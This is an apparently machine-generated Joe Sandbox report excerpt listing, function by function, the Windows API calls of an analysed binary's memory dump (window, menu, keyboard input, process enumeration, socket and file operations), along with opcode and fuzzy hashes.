                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101373B: GetParent.USER32(00000000), ref: 01013746
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0101390F
                                                                                                                                                                                                                                                                                                        • EnumChildWindows.USER32(?,01013987), ref: 01013937
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: %s%d
                                                                                                                                                                                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                        • Opcode ID: 15d8f1032118b1e1a5ef479a81c30710a0eaf0da53861a1ce0c768da110cb583
                                                                                                                                                                                                                                                                                                        • Instruction ID: b6e3900b2077477a2456b9640d041f8f0d1722dd9441a0116347241697d6da9f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d8f1032118b1e1a5ef479a81c30710a0eaf0da53861a1ce0c768da110cb583
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6511D8B56002099BCF117F749D85AED77AEBFA8314F048079A9899F145CE395805DB20
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 01046360
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0104638D
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 0104639C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: 43524f2819f7b952b8ed3bcb2f16e4d642229eb32c25e53b83b149a1490ca603
                                                                                                                                                                                                                                                                                                        • Instruction ID: 697851473f0e2d0a990d97bb7156d0ee9f108f117534224c76a7161996de80bf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43524f2819f7b952b8ed3bcb2f16e4d642229eb32c25e53b83b149a1490ca603
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28018BB1500218AFDB219F54DC84BAE7BB5FB45311F04C0AAE88996140DF358A80EF21
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9b6796fabeee457a187bbe5171dd91badd4b6e27d214f8589941f401f92ed18a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 855e7a0d77a0bd0e5f012992610a3c13871798c6ef74af3a4a3ae7a2ea02e4dd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b6796fabeee457a187bbe5171dd91badd4b6e27d214f8589941f401f92ed18a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22C16C75A0020AEFDB04CF98C884EAEBBB5FF48704F148198F5859B259D735EE81CB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                        • Instruction ID: e760c005c3f850a7c28a7a01b15434c070498508a139cca932271b011b5a302b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7A15B72E003C69FDB11DF1AC8917AEBBE5EF51324F1841ADE9559B2C1C338A941E750
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010EE0
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010EF8
                                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0104DCE0,000000FF,?,00000000,00000800,00000000,?,01050BD4,?), ref: 01010F1D
                                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 01010F3E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d18d3e659961418f99b08e7a2493559d28bdcba2ed2591a935d41a5cb5282356
                                                                                                                                                                                                                                                                                                        • Instruction ID: bb760bd861a384fffd498b41b1dca5083b8e890536a441853cd3532c272906d7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d18d3e659961418f99b08e7a2493559d28bdcba2ed2591a935d41a5cb5282356
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3813975A00109EFCB00DF98C984EEEB7B9FF89315F204198F546AB254DB75AE46CB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0103B10C
                                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0103B11A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0103B1FC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103B20B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FF4D73,?), ref: 00FCE395
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0063bd360342d37e6f042a11fe576b89944aafd49dfb72f42d222048c0875c45
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7ecad2c84b98259f6025c80d8400670c1f057a9ba54227c3e249498eb917ccf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0063bd360342d37e6f042a11fe576b89944aafd49dfb72f42d222048c0875c45
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 155148B1A08301AFD310EF25C886A9BBBE8FF89754F40491DF98597251EB75E904CF92
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 0103255A
• WSAGetLastError.WSOCK32 ref: 01032568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 010325E7
• WSAGetLastError.WSOCK32 ref: 010325F1
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
APIs
• GetWindowRect.USER32(?,?), ref: 01046D1A
• ScreenToClient.USER32(?,?), ref: 01046D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01046DBA
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 010261C8
• GetLastError.KERNEL32(?,00000000), ref: 010261EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 01026213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0102623F
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 194e936b667c108544b2cc3b7038db3b5fc86050bc51d8f0a21b57dafec8e4aa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 35bc8095531b1e1ba3b47ce4449d6c4522f4c8c6edb4532548a37ee6bf0c5bd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 194e936b667c108544b2cc3b7038db3b5fc86050bc51d8f0a21b57dafec8e4aa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82415F39600610DFCB11DF55C584A9EBBE6EF99710B188488EC4A9B362CB39FC05DF91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0101B473
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0101B48F
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0101B4FD
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0101B54F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6375aa7e8170906c2d90ff35907b48cc4c307db062aeb9fb8ac99f4b832891fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c063cf827d7d3f9e7351cf16e1297e973505fef8f6998df9c03a4b5909ddcad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6375aa7e8170906c2d90ff35907b48cc4c307db062aeb9fb8ac99f4b832891fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC311270A80248ABFB31CB6C8844BFE7BB5AB48314F04825AE5D6961D9CB7D858587A1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0101B5B8
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0101B5D4
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0101B63B
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0101B68D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbc7f7f5fb8af8de0650e77a2b27132ead22e41ff72a4bc740b745bdeb4810b5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 09c8713ccdf82bfd4f72b1e7a0796cffa79cf1b0dc6034d3362c829099f4a10e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbc7f7f5fb8af8de0650e77a2b27132ead22e41ff72a4bc740b745bdeb4810b5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE315C70A00648AFFF318B6C88047FE7BF6AFAC310F044A6AE4C1821D9C37C86418B91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 010480D4
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0104814A
                                                                                                                                                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 0104815A
                                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 010481C6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b6337e6c0885adf2d59485a158267e797e57d54b629837acf8f75bf58973071b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c0f91922665af898a54008489f917734daf1f59a9e4de2b06a095e94fe3d106
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6337e6c0885adf2d59485a158267e797e57d54b629837acf8f75bf58973071b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB41A0B4A00205DFDB12DF98C4D4AAD7BF9BB49310F0488B7EAC49B265C735A841CB40
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 01042187
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • GetCaretPos.USER32(?), ref: 0104219B
                                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 010421E8
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 010421EE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 548181130084312226f762d7fb74d9f4885b8f2dcd3e7a11ff27bb4ce9506b0d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 16d21ccc04bc92d0f86d09a6ff11cec0e19b8d60eca9e97f0a7e818925bd0837
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548181130084312226f762d7fb74d9f4885b8f2dcd3e7a11ff27bb4ce9506b0d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 043152B5E00109AFC700DFAAC8C1CEEB7FCEF98304B5040A9E455E7211D6759E45CBA0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E8E2
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E8F9
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E924
                                                                                                                                                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0101E92F
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3e07c15526661c07c93c6a64a43c684bf02ad068e88a8af5ffcd8d2024aab318
                                                                                                                                                                                                                                                                                                        • Instruction ID: 414f45a339c5a55db0fd64c2996f8c0a6de2c0565ebc50f11244f2ed009b969a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e07c15526661c07c93c6a64a43c684bf02ad068e88a8af5ffcd8d2024aab318
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D821F671D00214AFCB52AFA8CD81BAEB7F9EF45310F1440A5F944AB345D7789E418BA1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,0104DC30), ref: 0101DBA6
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0101DBB5
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101DBC4
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0104DC30), ref: 0101DC21
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 408b6db47c11544a54589dd2bba2ea3f24bc93c5d1b30eea76632d4403a4bb4e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 35211fe3765cf08c5f0a9cd44af03791228bd6bffcce03e8827eaacee328002f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 408b6db47c11544a54589dd2bba2ea3f24bc93c5d1b30eea76632d4403a4bb4e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21B17020420A9F8310DFA8C98489ABBE8FF69364F104A5DF4D987291DB39D946CF42
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01049A5D
                                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01049A72
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01049ABA
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 01049AF0
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 18d966fd9df41db321061192834d44b974afb9661222596fea317219a4d846c6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b864d5bca9f294a951062cd62c2b4b8045ff34952a18dd1e6e23bc4467173afd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18d966fd9df41db321061192834d44b974afb9661222596fea317219a4d846c6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65219C74600018AFDF258F98C888EEF7FBAEB09354F4041B5FA858B161D7359960DB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 010432A6
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010432C0
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010432CE
                                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010432DC
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2169480361-0
